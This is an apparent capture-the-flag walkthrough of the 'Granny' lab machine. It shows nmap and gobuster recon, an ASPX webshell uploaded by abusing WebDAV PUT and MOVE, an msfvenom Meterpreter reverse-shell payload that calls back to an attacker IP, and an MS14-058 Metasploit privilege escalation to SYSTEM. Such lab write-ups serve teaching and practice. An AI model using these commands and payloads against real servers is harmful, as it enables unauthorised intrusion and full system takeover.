Granny

Reconnaissance:

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.15

80/tcp open  http    Microsoft IIS httpd 6.0
|_http-title: Under Construction
| http-methods: 
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
| http-ntlm-info: 
|   Target_Name: GRANNY
|   NetBIOS_Domain_Name: GRANNY
|   NetBIOS_Computer_Name: GRANNY
|   DNS_Domain_Name: granny
|   DNS_Computer_Name: granny
|_  Product_Version: 5.2.3790
| http-webdav-scan: 
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|   Server Type: Microsoft-IIS/6.0
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Server Date: Thu, 14 Dec 2023 02:17:01 GMT
|_  WebDAV type: Unknown


┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.15 
All 1000 scanned ports on 10.10.10.15 are in ignored states.

nmap shows only port 80 open. It’s a website, and the webdav-scan is particularly interesting (I’ll come back to that in a minute):

Enumeration: TCP 80

http://10.10.10.15/

  • Operating systems: Windows Server

  • Web frameworks: Microsoft ASP.NET

  • Web servers: IIS 6.0

The site just says “Under Construction”

Headers: I’ll also check out the response header:

X-Powered-By: ASP.NET

The X-Powered-By: ASP.NET tells me that aspx files may execute if I can get them onto target.

gobuster: I’ll start looking for paths on this server with gobuster, but it doesn’t find anything interesting:

┌──(kali㉿kali)-[~]
└─$ gobuster dir -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.15/

gobuster dir -w /usr/share/wordlists/dirb/common.txt -l -t 30 -e -k -x .html,.asp,.php -u http://10.10.10.15:80 

gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://10.10.10.15 -t 50 -x aspx,txt,html

/images               (Status: 301) [Size: 149] [--> http://10.10.10.15/images/]
/Images               (Status: 301) [Size: 149] [--> http://10.10.10.15/Images/]
/IMAGES               (Status: 301) [Size: 149] [--> http://10.10.10.15/IMAGES/]
/_private             (Status: 301) [Size: 153] [--> http://10.10.10.15/%5Fprivate/]

Both /images and /_private are empty dirs.

┌──(kali㉿kali)-[~]
└─$ nikto -host 10.10.10.15:80 

+ /: Retrieved x-powered-by header: ASP.NET.
+ /nikto-test-L2AWxGEP.html: HTTP method 'PUT' allows clients to save files on the web server. See: https://portswigger.net/kb/issues/00100900_http-put-method-is-enabled
+ /nikto-test-L2AWxGEP.html: HTTP method 'DELETE' allows clients to delete files on the web server. See: https://cwe.mitre.org/data/definitions/650.html
+ HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.

WebDAV

Web Distributed Authoring and Versioning (WebDAV) is an HTTP extension designed to allow people to create and modify web sites using HTTP. It was originally started in 1996, when this didn’t seem like a terrible idea. I don’t see that often on recent HTB machines, but I did come across it in PWK/OSCP. The scan shows that the HTTP PUT method is allowed. This could potentially give us the ability to save files on the web server. Since this is a Microsoft IIS web server, the type of files it executes are ASP and ASPX. So let’s check if we’re allowed to upload these file extensions.

┌──(kali㉿kali)-[~]
└─$ davtest --url http://10.10.10.15

 Sending test files
PUT     shtml   FAIL
PUT     asp     FAIL
PUT     jhtml   SUCCEED:        http://10.10.10.15/DavTestDir_y3QbIHW88/davtest_y3QbIHW88.jhtml
PUT     txt     SUCCEED:        http://10.10.10.15/DavTestDir_y3QbIHW88/davtest_y3QbIHW88.txt
PUT     cfm     SUCCEED:        http://10.10.10.15/DavTestDir_y3QbIHW88/davtest_y3QbIHW88.cfm
PUT     jsp     SUCCEED:        http://10.10.10.15/DavTestDir_y3QbIHW88/davtest_y3QbIHW88.jsp
PUT     php     SUCCEED:        http://10.10.10.15/DavTestDir_y3QbIHW88/davtest_y3QbIHW88.php
PUT     pl      SUCCEED:        http://10.10.10.15/DavTestDir_y3QbIHW88/davtest_y3QbIHW88.pl
PUT     cgi     FAIL
PUT     html    SUCCEED:        http://10.10.10.15/DavTestDir_y3QbIHW88/davtest_y3QbIHW88.html
PUT     aspx    FAIL
********************************************************
 Checking for test file execution
EXEC    jhtml   FAIL
EXEC    txt     SUCCEED:        http://10.10.10.15/DavTestDir_y3QbIHW88/davtest_y3QbIHW88.txt
EXEC    txt     FAIL
EXEC    cfm     FAIL
EXEC    jsp     FAIL
EXEC    php     FAIL
EXEC    pl      FAIL
EXEC    html    SUCCEED:        http://10.10.10.15/DavTestDir_y3QbIHW88/davtest_y3QbIHW88.html
EXEC    html    FAIL

Both ASP and ASPX are not allowed. However, TXT and HTML files are. Remember that the PUT HTTP method was not the only method that was allowed. We also can use the MOVE method. The MOVE method not only can be used to change file locations on the web server, but it can also be used to rename files. Let’s try to upload an HTML file on the web server and then rename it to change the extension to an ASPX file.

┌──(kali㉿kali)-[~/Desktop]
└─$ curl -X PUT http://10.10.10.15/test.html -d @test.html
                                                                                              
┌──(kali㉿kali)-[~/Desktop]
└─$ curl http://10.10.10.15/test.html
<h1>Hello</h1>

We confirm that the HTML file was correctly uploaded on the web server. Next, let’s change the extension of the HTML file to ASPX.

┌──(kali㉿kali)-[~/Desktop]
└─$ curl -X MOVE --header 'Destination:http://10.10.10.15/test.aspx' 'http://10.10.10.15/test.html'
                                                                                              
┌──(kali㉿kali)-[~/Desktop]
└─$ curl http://10.10.10.15/test.aspx
<h1>Hello</h1>

Foothold:

Upload Webshell: The first thing I’ll need to do is upload my webshell. Kali has a simple one at /usr/share/webshells/aspx/cmdasp.aspx. I’ll grab a copy:

┌──(kali㉿kali)-[~/Desktop]
└─$ cp /usr/share/webshells/aspx/cmdasp.aspx .

Now I’ll upload that to target as a txt using curl and the http put method:

┌──(kali㉿kali)-[~/Desktop]
└─$ curl -X PUT http://10.10.10.15/shell.txt -d @cmdasp.aspx

If I look at the page now, I’ll see the code, but it’s not executed, as the server is treating it as text:

Move Webshell: Now I’ll use the next webdav command, MOVE. Again, I can do this with curl:

┌──(kali㉿kali)-[~/Desktop]
└─$ curl -X MOVE -H 'Destination:http://10.10.10.15/shell.aspx' http://10.10.10.15/shell.txt

http://10.10.10.15/shell.aspx
whoami
nt authority\network service

Meterpreter: I’ll do the same thing with a meterpreter payload. Create it:

┌──(kali㉿kali)-[~/Desktop]
└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.2 LPORT=443 -f aspx > shelly.aspx

Upload:
┌──(kali㉿kali)-[~/Desktop]
└─$ curl -X PUT http://10.10.10.15/shelly.txt -d @shelly.aspx 

┌──(kali㉿kali)-[~/Desktop]
└─$ curl -X MOVE -H 'Destination: http://10.10.10.15/shelly.aspx' http://10.10.10.15/shelly.txt

Start Metasploit:

┌──(kali㉿kali)-[~]
└─$ msfconsole  

msf6 > use exploit/multi/handler 
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST tun0
msf6 exploit(multi/handler) > set lport 443
msf6 exploit(multi/handler) > options
msf6 exploit(multi/handler) > run

Trigger it, and it fails:

http://10.10.10.15/shelly.aspx

Why? If I upload shelly.txt again, I can see that the whitespace is all jacked up I’ll upload again, this time using --data-binary to preserve endlines and other control characters:

┌──(kali㉿kali)-[~/Desktop]
└─$ curl -X PUT http://10.10.10.15/shelly.txt --data-binary @shelly.aspx

On refreshing shelly.txt, I see it looks much cleaner Now I’ll move the file and trigger it:

┌──(kali㉿kali)-[~/Desktop]
└─$ curl -X MOVE -H 'Destination: http://10.10.10.15/shelly.aspx' http://10.10.10.15/shelly.txt 

┌──(kali㉿kali)-[~/Desktop]
└─$ curl http://10.10.10.15/shelly.aspx

And get a shell:
[*] Sending stage (175686 bytes) to 10.10.10.15
[*] Meterpreter session 1 opened (10.10.14.2:443 -> 10.10.10.15:1030) at 2023-12-13 23:46:12 -0500

Privesc:

Enumeration:

On those older boxes, I am more likely to checkout local exploits, and Metasploit has a nice module for that, post/multi/recon/local_exploit_suggester:

meterpreter > background
msf6 exploit(multi/handler) > search local_exploit
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set session 2
msf6 post(multi/recon/local_exploit_suggester) > run

There’s a lot of stuff to go for.
 1   exploit/windows/local/ms10_015_kitrap0d                        Yes                      The service is running, but could not be validated.                                            
 2   exploit/windows/local/ms14_058_track_popup_menu                Yes                      The target appears to be vulnerable.                                                           
 3   exploit/windows/local/ms14_070_tcpip_ioctl                     Yes                      The target appears to be vulnerable.                                                           
 4   exploit/windows/local/ms15_051_client_copy_image               Yes                      The target appears to be vulnerable.                                                           
 5   exploit/windows/local/ms16_016_webdav                          Yes                      The service is running, but could not be validated.                                            
 6   exploit/windows/local/ms16_075_reflection                      Yes                      The target appears to be vulnerable.                                                           
 7   exploit/windows/local/ppr_flatten_rec                          Yes                      The target appears to be vulnerable.

MS14-058

I’ll pick one (somewhat at random, though I like this one as it says the target appears to be vulnerable):

msf6 post(multi/recon/local_exploit_suggester) > use windows/local/ms14_058_track_popup_menu
msf6 exploit(windows/local/ms14_058_track_popup_menu) > set session 2
msf6 exploit(windows/local/ms14_058_track_popup_menu) > run

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > cd 'C:\Documents and Settings'
meterpreter > cd 'C:Administrator'
meterpreter > cd 'C:Desktop'
meterpreter > ls
meterpreter > cat root.txt

PreviousBastardNextArtic

Last updated